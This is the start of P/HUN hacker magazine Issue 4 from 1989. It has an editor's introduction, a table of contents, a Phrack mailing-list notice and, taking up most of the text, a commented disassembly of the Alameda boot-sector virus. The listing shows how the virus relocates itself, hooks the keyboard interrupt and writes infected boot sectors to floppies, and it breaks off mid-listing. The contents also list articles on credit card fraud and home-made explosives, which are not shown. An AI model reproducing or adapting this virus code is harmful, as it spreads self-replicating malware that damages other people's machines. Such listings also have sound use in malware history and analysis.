8489 lines
212 KiB
Plaintext
8489 lines
212 KiB
Plaintext
![]() |
()=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=()
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4 , Volume 2 Articles [11]
|
|||
|
|
|||
|
Released: June 27th of 1989. Comments: SummerCon 89'
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
= The Toll Center Bulletin Board System =
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
( 2600 Magazine BBS # 5 & P/HUN Magazine Inc. Headquarters)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
(718)358/9209
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Presents......
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-== P/HUN ISSUE IV ==-
|
|||
|
|
|||
|
--------------
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 1 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Introduction:
|
|||
|
|
|||
|
-------------
|
|||
|
|
|||
|
Welcome once again to another exiciting issue of P/HUN Magazine.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
We are little behind schedule. The delay was caused by a severe disk crash
|
|||
|
|
|||
|
which wiped out most of the files. The whole issue had to be put back together
|
|||
|
|
|||
|
again.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
This time we have a special segment called P/HUN Telecom News/Advancements,
|
|||
|
|
|||
|
which contains the latest news in the telecommunications industry as we know
|
|||
|
|
|||
|
today. This segment will be released on a regular basis. I would like to thank
|
|||
|
|
|||
|
DareDevil for taking the first shot it. We would appreciate some feedback on
|
|||
|
|
|||
|
this new concept.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If you have any articles to contribute please get in touch with us at our
|
|||
|
|
|||
|
BBS or at our Usenet address.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Red Knight
|
|||
|
|
|||
|
Usenet Address: pdave@dasys1.UUCP
|
|||
|
|
|||
|
SysOp of The Toll Center
|
|||
|
|
|||
|
Phortune 500/Board of Directors
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
=:Table of Contents:=
|
|||
|
|
|||
|
------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
# Phile Description Author Size
|
|||
|
|
|||
|
-- ------------------------------------------- ------ ------
|
|||
|
|
|||
|
1) Introduction & Table of Contents Red Knight 2K
|
|||
|
|
|||
|
2) The Banishment of Phrack Inc. Knight Lightning 5K
|
|||
|
|
|||
|
3) A Boot Sector Virus Southern Cross 21K
|
|||
|
|
|||
|
4) Vital Credit Card Information & Usage The Sparrow 31K
|
|||
|
|
|||
|
5) An Introduction to House Explosives Franz Liszt 19K
|
|||
|
|
|||
|
6) TSPS No. 1B - Call Processing & Explanation Phelix the Hack 34K
|
|||
|
|
|||
|
7) Free Computer Magazines Southern Cross 6K
|
|||
|
|
|||
|
8) A Guide to Hacking AMOS NightCrawler 21K
|
|||
|
|
|||
|
9) USDN versus ISDN Lord Micro 22K
|
|||
|
|
|||
|
10) P/HUN Telecom News/Advancements DareDevil 30K
|
|||
|
|
|||
|
11) P/HUN Telecom News/Advamcements DareDevil 24K
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 2 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The Banishment Of Phrack Inc.
|
|||
|
|
|||
|
-----------------------------
|
|||
|
|
|||
|
by Knight Lightning
|
|||
|
|
|||
|
|
|||
|
|
|||
|
June 27, 1989 - August 28, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Hello. This message is being sent to all members of the Phrack Inc. Mailing
|
|||
|
|
|||
|
List to forewarn you of things to come. Due to certain policies at the
|
|||
|
|
|||
|
University Of Missouri - Columbia (UMCVMB), Taran King and I will lose our
|
|||
|
|
|||
|
Bitnet/Internet accounts on June 27, 1989. I would advise not sending files or
|
|||
|
|
|||
|
mail to either of our address after June 26, 1989 just to be safe.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Our "exile" from UMCVMB will last until August 28, 1989 when fall classes
|
|||
|
|
|||
|
begin. However, this does not mean we are putting Phrack Inc. on hold by any
|
|||
|
|
|||
|
means.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Solution: Anyone who has files to be placed in Phrack Inc. after June 26, 1989
|
|||
|
|
|||
|
should contact HATCHET MOLLY. He can be reached at "TK0GRM2@NIU.BITNET" or
|
|||
|
|
|||
|
"TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU". He will be handling the gathering of
|
|||
|
|
|||
|
files from you... our network friends.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Phrack Inc. Newsletter Issue 27 will be released within the next TWO WEEKS. If
|
|||
|
|
|||
|
you would like to receive this issue, please let me know as soon as possible.
|
|||
|
|
|||
|
The reason I make mention of this is because many people on the mailing list
|
|||
|
|
|||
|
are not currently accessing their work station for a variety of reasons
|
|||
|
|
|||
|
(school's out, on vacation, etc). So let us know and we will send it to you
|
|||
|
|
|||
|
when we release it.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The situation with our Bitnet/Internet addresses will not affect SummerCon '89
|
|||
|
|
|||
|
in any way. However, any issues of Phrack Inc. that we do release between June
|
|||
|
|
|||
|
27, 1989 and August 28, 1989 will *NOT* be sent over the networks to you until
|
|||
|
|
|||
|
September 1989. Taran King and I will not have access to the network and will
|
|||
|
|
|||
|
have no way to send these files until then. So it looks like bulletin boards
|
|||
|
|
|||
|
and software pirates will get first look during this time period.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
So if you have any further questions about this situation, mail us right away.
|
|||
|
|
|||
|
Remember, any comments or information for Phrack Inc. after June 26, 1989
|
|||
|
|
|||
|
should be directed to Hatchet Molly.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Knight Lightning Taran King
|
|||
|
|
|||
|
C483307@UMCVMB.BITNET C488869@UMCVMB.BITNET
|
|||
|
|
|||
|
C483307@UMCVMB.MISSOURI.EDU C488869@UMCVMB.MISSOURI.EDU
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Hatchet Molly
|
|||
|
|
|||
|
TK0GRM2@NIU.BITNET
|
|||
|
|
|||
|
TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
"The Real Future Is Behind You!"
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 3 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
A BOOT SECTOR VIRUS
|
|||
|
|
|||
|
5/15/89
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The following is a disassembled and commented version of the Alemeda
|
|||
|
|
|||
|
College Boot infector virus. Courtesy of Southern Cross.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; This virus is of the "FLOPPY ONLY" variety. ;
|
|||
|
|
|||
|
; It replicates to the boot sector of a floppy disk and when it gains control
|
|||
|
|
|||
|
; it will move itself to upper memory. It redirects the keyboard ;
|
|||
|
|
|||
|
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
|
|||
|
|
|||
|
; it will attempt to infect any floppy it finds in drive A:. ;
|
|||
|
|
|||
|
; It keeps the real boot sector at track 39, sector 8, head 0 ;
|
|||
|
|
|||
|
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
|
|||
|
|
|||
|
; and should that area be used by a file, the virus ;
|
|||
|
|
|||
|
; will die. It also contains no anti detection mechanisms as does the ;
|
|||
|
|
|||
|
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
|
|||
|
|
|||
|
; sector 9 because this is common to all floppy formats both single ;
|
|||
|
|
|||
|
; sided and double sided. It does not contain any malevolent TROJAN ;
|
|||
|
|
|||
|
; HORSE code. It does appear to contain a count of how many times it ;
|
|||
|
|
|||
|
; has infected other diskettes although this is harmless and the count ;
|
|||
|
|
|||
|
; is never accessed. ;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
; Things to note about this virus: ;
|
|||
|
|
|||
|
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
|
|||
|
|
|||
|
; is its primary (only for that matter) means of reproduction to other ;
|
|||
|
|
|||
|
; floppy diskettes. The only way to remove it from an infected system ;
|
|||
|
|
|||
|
; is to turn the machine off and reboot an uninfected copy of DOS. ;
|
|||
|
|
|||
|
; It is even resident when no floppy is booted but BASIC is loaded ;
|
|||
|
|
|||
|
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
|
|||
|
|
|||
|
; it activates and infectes the floppy from which the user is ;
|
|||
|
|
|||
|
; attempting to boot. ;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
; Also note that because of the POP CS command to pass control to ;
|
|||
|
|
|||
|
; its self in upper memory, this virus does not to work on 80286 ;
|
|||
|
|
|||
|
; machines (because this is not a valid 80286 instruction). ;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
; The Norton Utilities can be used to identify infected diskettes by ;
|
|||
|
|
|||
|
; looking at the boot sector and the DOS SYS utility can be used to ;
|
|||
|
|
|||
|
; remove it (unlike the Pakistani Brain). ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
ORG 7C00H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
TOS LABEL WORD ;TOP OF STACK
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; 1. Find top of memory and copy ourself up there. (keeping same offset);
|
|||
|
|
|||
|
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
|
|||
|
|
|||
|
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
|
|||
|
|
|||
|
; 4. Jump to ourself at top of memory ;
|
|||
|
|
|||
|
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
BEGIN: CLI ;INITIALIZE STACK
|
|||
|
|
|||
|
XOR AX,AX ;
|
|||
|
|
|||
|
MOV SS,AX ;
|
|||
|
|
|||
|
MOV SP,offset TOS ;
|
|||
|
|
|||
|
STI ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
|
|||
|
|
|||
|
MOV DS,BX ;
|
|||
|
|
|||
|
MOV AX,[0013H] ;
|
|||
|
|
|||
|
MUL BX ;
|
|||
|
|
|||
|
SUB AX,07E0H ; (7C00H+512)/16
|
|||
|
|
|||
|
MOV ES,AX ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH CS ;DS = CS
|
|||
|
|
|||
|
POP DS ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
|
|||
|
|
|||
|
JNE B_10 ;
|
|||
|
|
|||
|
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
|
|||
|
|
|||
|
MOV DI,SI ;
|
|||
|
|
|||
|
MOV CX,512 ;
|
|||
|
|
|||
|
CLD ;
|
|||
|
|
|||
|
REP MOVSB ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
|
|||
|
|
|||
|
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
|
|||
|
|
|||
|
MOV CX,128 ;
|
|||
|
|
|||
|
REP MOVSB ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH ES ;ES=HI ;JUMP TO OUR HI CODE WITH
|
|||
|
|
|||
|
POP CS ; CS = ES
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH DS ;DS=0 ;ES = DS
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV BX,SP ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
|
|||
|
|
|||
|
MOV DX,CX ;CX=0 ; DRIVE A: HEAD 0
|
|||
|
|
|||
|
MOV CX,2708H ; TRACK 40, SECTOR 8
|
|||
|
|
|||
|
MOV AX,0201H ; READ SECTOR
|
|||
|
|
|||
|
INT 13H ; (common to 8/9 sect. 1/2 sided!)
|
|||
|
|
|||
|
JB $ ; HANG IF ERROR
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
JMP JMP_BOOT ;JMP 0000:7C00
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; SAVE THEN REDIRECT INT 9 VECTOR ;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
; ON ENTRY: DS = 0 ;
|
|||
|
|
|||
|
; ES = WHERE TO SAVE OLD_09 & (HI) ;
|
|||
|
|
|||
|
; WHERE NEW_09 IS (HI) ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
PUT_NEW_09: ;
|
|||
|
|
|||
|
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV SI,9*4 ;COPY INT 9 VECTOR TO
|
|||
|
|
|||
|
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
|
|||
|
|
|||
|
MOV CX,0004 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CLI ;
|
|||
|
|
|||
|
REP MOVSB ;
|
|||
|
|
|||
|
MOV Word Ptr [9*4],offset NEW_09
|
|||
|
|
|||
|
MOV [(9*4)+2],ES ;
|
|||
|
|
|||
|
STI ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
RET ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
ACK_KEYBD: ;
|
|||
|
|
|||
|
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
|
|||
|
|
|||
|
MOV AH,AL ;
|
|||
|
|
|||
|
OR AL,80H ;
|
|||
|
|
|||
|
OUT 61H,AL ;
|
|||
|
|
|||
|
XCHG AL,AH ;
|
|||
|
|
|||
|
OUT 61H,AL ;
|
|||
|
|
|||
|
JMP RBOOT ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
|
|||
|
|
|||
|
; REASON UNKNOWN ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
|
|||
|
|
|||
|
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
|
|||
|
|
|||
|
DB 27H,0,3,2 ;
|
|||
|
|
|||
|
DB 27H,0,4,2 ;
|
|||
|
|
|||
|
DB 27H,0,5,2 ;
|
|||
|
|
|||
|
DB 27H,0,6,2 ;
|
|||
|
|
|||
|
DB 27H,0,7,2 ;
|
|||
|
|
|||
|
DB 27H,0,8,2 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;A7C9A LABEL BYTE ;
|
|||
|
|
|||
|
DW 00024H ;NOT USED
|
|||
|
|
|||
|
DB 0ADH ;
|
|||
|
|
|||
|
DB 07CH ;
|
|||
|
|
|||
|
DB 0A3H ;
|
|||
|
|
|||
|
DW 00026H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;L7CA1: ;
|
|||
|
|
|||
|
POP CX ;NOT USED
|
|||
|
|
|||
|
POP DI ;
|
|||
|
|
|||
|
POP SI ;
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
POP DS ;
|
|||
|
|
|||
|
POP AX ;
|
|||
|
|
|||
|
POPF ;
|
|||
|
|
|||
|
JMP 1111:1111 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; IF ALT & CTRL & DEL THEN ... ;
|
|||
|
|
|||
|
; IF ALT & CTRL & ? THEN ... ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
NEW_09: PUSHF ;
|
|||
|
|
|||
|
STI ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH AX ;
|
|||
|
|
|||
|
PUSH BX ;
|
|||
|
|
|||
|
PUSH DS ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH CS ;DS=CS
|
|||
|
|
|||
|
POP DS ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV BX,[ALT_CTRL] ;BX=SCAN CODE LAST TIME
|
|||
|
|
|||
|
IN AL,60H ;GET SCAN CODE
|
|||
|
|
|||
|
MOV AH,AL ;SAVE IN AH
|
|||
|
|
|||
|
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CMP AL,1DH ;IS IT A [CTRL]...
|
|||
|
|
|||
|
JNE N09_10 ;...JUMP IF NO
|
|||
|
|
|||
|
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
|
|||
|
|
|||
|
JMP N09_30 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N09_10: CMP AL,38H ;IS IT AN [ALT]...
|
|||
|
|
|||
|
JNE N09_20 ;...JUMP IF NO
|
|||
|
|
|||
|
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
|
|||
|
|
|||
|
JMP N09_30 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
|
|||
|
|
|||
|
JNE N09_30 ;...JUMP IF NO
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CMP AL,17H ;IF [I]...
|
|||
|
|
|||
|
JE N09_X0 ;...JUMP IF YES
|
|||
|
|
|||
|
CMP AL,53H ;IF [DEL]...
|
|||
|
|
|||
|
JE ACK_KEYBD ;...JUMP IF YES
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N09_90: POP DS ;
|
|||
|
|
|||
|
POP BX ;
|
|||
|
|
|||
|
POP AX ;
|
|||
|
|
|||
|
POPF ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
DB 0EAH ;JMP F000:E987
|
|||
|
|
|||
|
OLD_09 DW ? ;
|
|||
|
|
|||
|
DW 0F000H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N09_X0: JMP N09_X1 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
|
|||
|
|
|||
|
MOV AX,0800H ;AL=0, AH=DELAY ARG
|
|||
|
|
|||
|
OUT DX,AL ;
|
|||
|
|
|||
|
CALL DELAY ;
|
|||
|
|
|||
|
MOV [ALT_CTRL],AX ;AX=0 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
|
|||
|
|
|||
|
INT 10H ;
|
|||
|
|
|||
|
MOV AH,2 ;SET CURSOR POS 0,0
|
|||
|
|
|||
|
XOR DX,DX ;
|
|||
|
|
|||
|
MOV BH,DH ; PAGE 0
|
|||
|
|
|||
|
INT 10H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV AH,1 ;SET CURSOR TYPE
|
|||
|
|
|||
|
MOV CX,0607H ;
|
|||
|
|
|||
|
INT 10H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
|
|||
|
|
|||
|
CALL DELAY ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
CLI ;
|
|||
|
|
|||
|
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
|
|||
|
|
|||
|
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
|
|||
|
|
|||
|
MOV SI,offset BEGIN - 128 ;
|
|||
|
|
|||
|
MOV CX,128 ;
|
|||
|
|
|||
|
CLD ;
|
|||
|
|
|||
|
REP MOVSB ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV DS,CX ;CX=0 ;DS=0
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
|
|||
|
|
|||
|
MOV [(19H*4)+2],CS ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV AX,0040H ;DS = ROM DATA AREA
|
|||
|
|
|||
|
MOV DS,AX ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
|
|||
|
|
|||
|
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH DS ;IF BIOS F000:E502 == 21E4...
|
|||
|
|
|||
|
MOV AX,0F000H ;
|
|||
|
|
|||
|
MOV DS,AX ;
|
|||
|
|
|||
|
CMP Word Ptr [0E502H],21E4H ;
|
|||
|
|
|||
|
POP DS ;
|
|||
|
|
|||
|
JE R_90 ;
|
|||
|
|
|||
|
INT 19H ; IF NOT...REBOOT
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; REBOOT INT VECTOR ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
NEW_19: XOR AX,AX ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV DS,AX ;DS=0
|
|||
|
|
|||
|
MOV AX,[0410] ;AX=EQUIP FLAG
|
|||
|
|
|||
|
TEST AL,1 ;IF FLOPPY DRIVES ...
|
|||
|
|
|||
|
JNZ N19_20 ;...JUMP
|
|||
|
|
|||
|
N19_10: PUSH CS ;ELSE ES=CS
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
|||
|
|
|||
|
INT 18H ;LOAD BASIC
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N19_20: MOV CX,0004 ;RETRY COUNT = 4
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
N19_22: PUSH CX ;
|
|||
|
|
|||
|
MOV AH,00 ;RESET DISK
|
|||
|
|
|||
|
INT 13 ;
|
|||
|
|
|||
|
JB N19_81 ;
|
|||
|
|
|||
|
MOV AX,0201 ;READ BOOT SECTOR
|
|||
|
|
|||
|
PUSH DS ;
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
MOV BX,offset BEGIN ;
|
|||
|
|
|||
|
MOV CX,1 ;TRACK 0, SECTOR 1
|
|||
|
|
|||
|
INT 13H ;
|
|||
|
|
|||
|
N19_81: POP CX ;
|
|||
|
|
|||
|
JNB N19_90 ;
|
|||
|
|
|||
|
LOOP N19_22 ;
|
|||
|
|
|||
|
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; Reinfection segment. ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
|
|||
|
|
|||
|
JNZ RE_INFECT ;...RE INFECT
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
|
|||
|
|
|||
|
JMP 0000:7C00H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; Reinfection Segment. ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
RE_INFECT: ;
|
|||
|
|
|||
|
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
|
|||
|
|
|||
|
MOV CX,00E6H ; OURSELF
|
|||
|
|
|||
|
MOV DI,SI ;
|
|||
|
|
|||
|
PUSH CS ;
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
CLD ;
|
|||
|
|
|||
|
REPE CMPSB ;
|
|||
|
|
|||
|
JE RI_12 ;IF NOT EQUAL...
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
|
|||
|
|
|||
|
MOV BX,offset TABLE ;FORMAT INFO
|
|||
|
|
|||
|
MOV DX,0000 ;DRIVE A: HEAD 0
|
|||
|
|
|||
|
MOV CH,40-1 ;TRACK 39
|
|||
|
|
|||
|
MOV AH,5 ;FORMAT
|
|||
|
|
|||
|
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
; <<< NO EXECUTION PATH TO HERE >>> ;
|
|||
|
|
|||
|
JB RI_80 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
|
|||
|
|
|||
|
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
|
|||
|
|
|||
|
MOV BX,offset BEGIN ;TRACK 40H
|
|||
|
|
|||
|
MOV CL,8 ;SECTOR 8
|
|||
|
|
|||
|
MOV AX,0301H ;WRITE 1 SECTOR
|
|||
|
|
|||
|
INT 13H ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
|
|||
|
|
|||
|
POP ES ;
|
|||
|
|
|||
|
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
|
|||
|
|
|||
|
MOV AX,0301 ;
|
|||
|
|
|||
|
INT 13H ;
|
|||
|
|
|||
|
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
|
|||
|
|
|||
|
INT 19H ;...FLAG AND REBOOT
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
|||
|
|
|||
|
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
|
|||
|
|
|||
|
JMP JMP_BOOT ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
|
|||
|
|
|||
|
MOV BX,0040H ;
|
|||
|
|
|||
|
MOV DS,BX ;
|
|||
|
|
|||
|
MOV [0072H],AX ; 0040:0072 = RESET FLAG
|
|||
|
|
|||
|
JMP N09_90 ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; DELAY ;
